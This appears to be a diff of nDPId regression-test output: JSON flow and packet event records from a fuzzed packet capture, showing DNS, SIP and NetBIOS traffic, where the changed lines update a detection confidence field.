-00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956232,"flow_last_seen":1120469956232,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469956232,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956232,"flow_last_seen":1120469956232,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469956232,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1120469956233,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469956233,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CrMAR5ypat6AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469956232,"flow_last_seen":1120469956233,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469956233,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
+00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469956232,"flow_last_seen":1120469956233,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469956233,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956945,"flow_last_seen":1120469956945,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469956945,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1120469956945,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469956945,"pkt":"ADBUADRWAODtAW69CABFAABIakgAAIARTQnAqAECwKgBAQq0ADUANP0xLN8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaSVzAGRrAAAhLwE="} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956945,"flow_last_seen":1120469956945,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469956945,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberci_s","num_queries":0,"num_answers":0,"reply_code":0,"query_type":25707,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956945,"flow_last_seen":1120469956945,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469956945,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberci_s","num_queries":0,"num_answers":0,"reply_code":0,"query_type":25707,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1120469957944,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469957944,"pkt":"ADBUADRWAODtAW69CABFAABIakkAAIARTQjAqAECwKgBAQq0ADUANP0xLN82AAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469956945,"flow_last_seen":1120469957944,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469957944,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469956945,"flow_last_seen":1120469957944,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469957944,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1120469959947,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469959947,"pkt":"ADBUADRWAODtAW69CABFAABIakoAAIARTQfAqAECwKgBAQq0ADUANP0xLN8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":186,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2151,"global_ts_msec":1120469961950} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":186,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2151,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469959947,"pkt":"ADBUADRWAODtAW69CGdFAABIaksAAIARTQbAqAECwKgBAQq0ADUAPP0xLN8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469956945,"flow_last_seen":1120469965955,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469965955,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120469572981,"flow_last_seen":1120469956406,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6064,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1120469965955,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469956945,"flow_last_seen":1120469965955,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469965955,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120469572981,"flow_last_seen":1120469956406,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6064,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1120469965955,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469970215,"flow_last_seen":1120469970215,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469970215,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":8329,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1120469970215,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469970215,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOak0AAIARTADAqAECwKgB\/wCJIIkAOluRhQoBEAABAAAAAAAAIEVGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973957,"flow_last_seen":1120469973957,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469973957,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2741,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1120469973957,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469973957,"pkt":"ADBUADRWAODtAW69CABFAABEalEAAIARTQTAqAECwKgBAQq1ADUAMPFJM8AAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973957,"flow_last_seen":1120469973957,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469973957,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2741,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973957,"flow_last_seen":1120469973957,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469973957,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2741,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469973959,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1120469973959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469973959,"pkt":"YuDtAW69ADBUADRWCABFAABbAABAAEARtz7AqIIBwKgBAgA1CrUAR9PFM8CAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 
-00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469973959,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469973959,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469985981,"flow_last_seen":1120469985981,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469985981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1120469985981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469985981,"pkt":"ADBUADRWAODtAW69CABFAABIalMAAIARTP7AqAECwKgBAQq2ADUANHZOs8ABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469985981,"flow_last_seen":1120469985981,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469985981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469985981,"flow_last_seen":1120469985981,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469985981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469986976,"flow_last_seen":1120469986976,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469986976,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2730,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1120469986976,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469986976,"pkt":"ADBUADRWAODtAW69CABFAABIalQAAIARTP3AqAECwKgBAQqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1120469988978,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469988978,"pkt":"ADBUADRWAODtAW69CABFAABIalUAAIARTPzAqAECwKgBAQq2ADUANHZOs8ABAAABAAAAAAB1BF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAjAAE="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469985981,"flow_last_seen":1120469988978,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469988978,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":35,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469985981,"flow_last_seen":1120469988978,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469988978,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":35,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1120469990981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469990981,"pkt":"ADBUADRWAOLtAW69CABFAABIalYAAIARTPvAqAECwKgBAQq2ADUANHZOs8ABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":197,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469985981,"flow_last_seen":1120469990981,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469990981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 